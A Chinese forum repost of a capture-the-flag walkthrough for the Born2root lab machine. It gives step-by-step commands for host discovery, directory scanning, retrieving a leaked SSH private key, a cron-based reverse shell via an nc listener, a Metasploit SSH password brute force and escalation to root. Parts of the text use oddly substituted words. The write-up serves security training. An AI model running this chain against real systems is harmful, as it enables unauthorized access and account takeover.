请选择 进入手机版 | 继续访问电脑版

Born2root-SSH服务渗透夺flag

[复制链接]
期待幸福 发表于 2021-1-2 19:42:23 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
因为Born2root是一个很好的渗透测试靶机,可以锻炼CTF的一些解题思维。但是照旧有些坑需要在这叙述一下。
准备工作


  • 先下载Born2root镜像并导入虚拟机,注意:本人将ova导入vmware时报了这个错误:

原因是OVFtools不兼容的问题,导入virtualbox管理问题!

2.安装好kali攻击机,这个自行官网下载,这里不再赘述。
攻击过程


  • 使用netdiscover下令发现存活主机。
  1. netdiscover -i eth0
复制代码

发现目的主机,开始展开攻击!

  • 首先使用nmap对目的主机举行信息收集。
  1. nmap -sV 192.168.101.31
复制代码

发现目的主机开放了ssh端口和一些网络服务。有大概存在ssh私钥泄露等问题,进一步举行渗透。

  • 使用欣赏器登录,进一步举行信息收集。

    发现了一些有用的信息,大概是目的主机的一个账户。
  • 使用dirb工具举行WEB目次扫描,更加深入地举行信息挖掘。
  1. dirb http://192.168.101.31/
复制代码

发掘到一些目次信息,并实验能不能从中找到flag信息。
首先先查找robots.txt文件,但是并没有发现有代价的信息。

最后打开http://192.168.101.31/icons/,发现出现了目次遍历。

打开VDSoyuAXiO.txt文件,发现了ssh的私钥加密信息。


  • 在下令行使用wget下令将这文件下载到桌面,并重定名为id_rsa。
  1. wget http://192.168.101.31/icons/VDSoyuAXiO.txt
复制代码


  • 将id_rsa权限更改为600
  1. chmod 600 id_rsa
复制代码

  • 然后使用该私钥实验登岸目的系统。
  1. ssh -i id_rsa martin@192.168.101.31
复制代码

乐成登岸目的系统,但是发现martin账户并不属于root用户组,无法提权。
然后再进一步查察/etc/passwd目次,收集账户信息。

进入home目次后发现共有三个用户,大概可以提权。
再查察/etc/crontab上系统执行的周期性任务。发现jimmy账户每隔五分钟执行一遍sekurity.py文件。因此可以实验编写py脚本反弹shell。

赋予脚本文件可执行的权限


  • 使用nc侦听端口,并反弹shell
  1. nc -lvp 4444
复制代码

发现jimmy用户也不属于root用户组,提权失败。最后剩下hadi账户。

  • hadi账户只能通过ssh口令暴力破解获取其登录密钥。
    在网上搜猜暗码,并生成一个hadi.txt暗码字典,生存在桌面即可。我使用过cupp生成,但是并不能乐成破解,读者可以自行选择。
  • 启动msfconsole,并加载相应模块举行弊端使用。
  1. msfconsoleuse auxiliary/scanner/ssh/ssh_loginset rhosts 192.168.101.31set username hadiset pass_file /root/Desktop/hadi.txtset threads 5set verbose truerun
复制代码
期待一段时间发现暗码是hadi123。实验登岸
  1. sessions -i 1
复制代码
在空缺处键入该下令,获取shell字符页面
  1. python -c "import pty; pty.spawn('/bin/bash')"
复制代码

  • 实验提权,暗码为hadi123
  1. su - root
复制代码
提权乐成


  • 查察flag


来源:https://blog.csdn.net/weixin_45007073/article/details/112074985
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

发布主题

专注素材教程免费分享
全国免费热线电话

18768367769

周一至周日9:00-23:00

反馈建议

27428564@qq.com 在线QQ咨询

扫描二维码关注我们

Powered by Discuz! X3.4© 2001-2013 Comsenz Inc.( 蜀ICP备2021001884号-1 )